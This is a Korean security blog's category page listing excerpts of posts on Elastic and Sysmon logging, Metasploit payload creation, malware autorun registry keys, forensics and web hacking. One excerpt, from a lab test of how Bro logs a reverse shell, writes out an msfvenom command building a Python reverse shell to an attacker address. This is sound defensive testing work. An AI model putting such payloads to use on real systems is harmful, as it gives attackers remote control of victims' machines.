Security 썸네일형 리스트형 sysmon + winlogbeat + elastic stack 1. elastic부터 elk 설치 메뉴얼: https://www.elastic.co/guide/en/elastic-stack-get-started/7.2/get-started-elastic-stack.html#install-elasticsearch Getting started with the Elastic Stack | Getting Started [7.2] | Elastic If you don’t see data in Kibana, try changing the date range to a larger range. By default, Kibana shows the last 15 minutes. If you see errors, make sure Metricbeat is running, then re.. 더보기 정보보안에서의 인공지능 도입 분야와 주요 사업자 - KISA :: 정보보안에서의 인공지능 도입 분야와 주요 사업자(KISA) 요약 :: + 인공지능 오픈소스 구글 텐서플로 (www.tensorflow.org) - python, java, c, go, javascript library 지원 - OS: Windows, Linux, MAC, 라즈베리파이 IBM 시스템ML systemml.apache.org MS Cognitive Toolkit (CNTK) github.com/Microsoft/CNTK NVIDIA cuDNN, DL4J, Caffe + FACT - 방대한 정보보안 관련 인터넷 지식들을 모두 검색하여 이해하고 패턴화시키는건 힘든 노가다 - 악성코드의 증가율 역시 다양한 변종의 출현과 함께 매번 새로운 기록 갱신중 - 분석해야 할 데이터 량의 급속한 증가는 .. 더보기 mac osx reverse shell 테스트 및 bro 로그 확인 reverse shell 통신시 bro에 로그가 어떻게 남는지 확인하기 위해 테스트 한 내용이다. + 테스트 환경- kali linux(attacker pc)- mac osx mojave(victim pc) 1. Attacker PC - metasploit 실행후 reverse shell 파일 생성msf > use exploit/multi/handler msf exploit(handler) > msfvenom -p cmd/unix/reverse_python LHOST=1.1.1.1 LPORT=8888 > -f raw > shell.py [*] exec: msfvenom -p cmd/unix/reverse_python LHOST=1.1.1.1 LPORT=8888 > -f raw > shell.py No p.. 더보기 Creating Metasploit Payloads Creating Metasploit PayloadsPeleusOften one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant paylo.. 더보기 침투테스터를 위한 파이썬 오픈소스 도구 소개 1) 웹 어플리케이션 모의해킹 이름설명URLwapiti웹 취약점 스캐너http://wapiti.sourceforge.net/w3af웹 취약점 스캐너http://w3af.org/category/pythonV3n0M-Scanner웹 취약점 스캐너https://github.com/v3n0m-Scanner/V3n0M-ScannerxsserXSS 취약점 스캐너http://xsser.sourceforge.net/sqlmapSQL 인젝션 점검 도구http://sqlmap.org/spiderfoot웹서버 풋프린팅 분석http://sourceforge.net/projects/spiderfoot/Parsero웹사이트 디렉터리 탐색https://github.com/behindthefirewalls/Parserodnsreco.. 더보기 ASCII Codes in Hex, Decimal This is a table that compare decimal numbers, ArtNet, Hex and ASCII. // help.malighting.com 더보기 악성코드 자동실행 Registry 자동 시작 Registry 위치HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ All values in this key are executed.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\ All values in this key are executed, and then their autostart reference is deleted.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\ All values in this key are executed as services.HKEY.. 더보기 개발자도 알아야 할 네트워크 포렌식 분석 기술, '안랩코어 2011' 컨퍼런스 안랩코어에서 발표한 '개발자도 알아야 할 네트워크 포렌식' 의 사용한 명령어들에 대해서 정리해 드리기로 하였습니다. 시연때 보여드렸던 명령어와 시간이 부족하여 소개해 드리고 싶었지만 하지 못했던 내용도 몇가지 추가하여 요약해 보고자 합니다. 간단히 사용명령어 들에 대해서 나열해 드리고, 추가적인 세부 설명이 필요한건 따로 주제로 빼서 다시 언급해 드리고자 합니다. 대부분의 많은 내용들은 이미 블로그에 포스팅 되어 있으므로 자세한 것은 블로그 내용을 참고해 보시면 됩니다. 일단, 초반에 보여드렸던 안드로이드 폰에서의 패킷덤프 잘 보이지 않았죠? 이것은 다음 링크를 보시면, 안드로이드 관련한 주제로 살펴볼 수 있습니다. http://www.packetinside.com/search/label/android .. 더보기 CVE (Common Vulnerabilities and Exposures) CVE 는 Common Vulnerabilities and Exposures 의 약자로서 한마디로 각 취약성의 고유한 이름이다. CVE 를 사용하기 전에는 같은 취약성에 대해서 기관과 업체마다 나름대로 이름을 붙여 사용했다. 예를 들면 같은 문제점에 대해서... CERT에서는 CA-96.06.cgi_example_code, CyberSafe에서는 Network: HTTP ? phf?Attack, ISS에서는 http-cgi-phf, AXENT에서는 phf CGI allows remote command execution, Bugtraq에서는 PHF Attacks ?Fun and games for the whole family, BindView에서는 #107 ? cgi-phf, Cisco에서는 #3200 ?.. 더보기 [Linux] Web Hacking (Linux Server Security) 1. Web Application Vulnerability - 최초의 웹 페이지는 정적(static)이었다. 즉, 모든 사람들이 누군가에 의해 만들어진 똑 같은 페이지만을 볼 수가 있었다. 대표적인 웹 언어로 분량이 많지 않고 부담이 적은 HTML이 있다. HTML(Hyper Text Markup Language)은 단순하고 직설적이며 어려운 개념이 거의 포함되어 있지 않다. - 현재의 웹 페이지들은 상호작용을 하며 동적 데이터를 갱신하고 복잡한 그래픽 화면에 필요한 동작들을 한다. 대표적인 예로 JSP, ASP, PHP등이 있다. 이러한 웹 페이지를 동적(dynamic) 웹 페이지라고 한다. 동적 웹 페이지는 사용자가 입력한 값에 따라서 서버에서 사용자에게 보여주는 페이지가 달라진다. - OWASP(O.. 더보기 이전 1 2 3 4 다음
